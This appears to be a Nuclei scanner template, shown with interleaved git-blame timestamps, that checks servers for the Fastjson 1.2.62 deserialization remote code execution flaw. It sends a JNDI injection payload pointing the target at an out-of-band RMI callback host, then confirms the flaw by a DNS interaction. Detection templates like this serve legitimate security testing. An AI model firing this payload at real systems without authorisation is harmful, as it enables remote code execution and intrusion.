2021-10-30 11:17:35 +00:00
|
|
|
id: fastjson-1-2-62-rce
|
2021-10-12 05:57:50 +00:00
|
|
|
|
|
|
|
info:
|
2022-05-25 21:03:39 +00:00
|
|
|
name: Fastjson 1.2.62 - Remote Code Execution
|
2021-10-12 05:57:50 +00:00
|
|
|
author: zh
|
|
|
|
severity: critical
|
2022-05-25 21:03:39 +00:00
|
|
|
description: Fastjson 1.2.62 is susceptible to a deserialization remote code execution vulnerability.
|
2021-10-12 05:57:50 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
|
|
|
- https://github.com/wyzxxz/fastjson_rce_tool
|
2022-05-25 18:52:37 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
2023-10-14 11:27:55 +00:00
|
|
|
cvss-score: 10
|
2022-05-25 18:52:37 +00:00
|
|
|
cwe-id: CWE-77
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: fastjson,rce,deserialization,oast
|
2021-10-12 05:57:50 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-10-12 05:57:50 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST / HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
{
|
|
|
|
"@type":"org.apache.xbean.propertyeditor.JndiConverter",
|
|
|
|
"AsText":"rmi://{{interactsh-url}}/exploit"
|
|
|
|
}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2023-10-14 11:27:55 +00:00
|
|
|
part: interactsh_protocol # Confirms DNS Interaction
|
2021-10-12 05:57:50 +00:00
|
|
|
words:
|
2021-10-12 06:37:05 +00:00
|
|
|
- "dns"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
negative: true
|
|
|
|
status:
|
2022-05-25 18:52:37 +00:00
|
|
|
- 200
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 490a00463044022073b92e389449e07f2b2ad409742a57f240e415f1c19b8fadc80f80011e9ea8b50220552a87da2e50a620fc692ab118790e3fbdb8dd89672bc19fe5f8bd0918fc0353:922c64590222798bb761d5b6d8e72950
|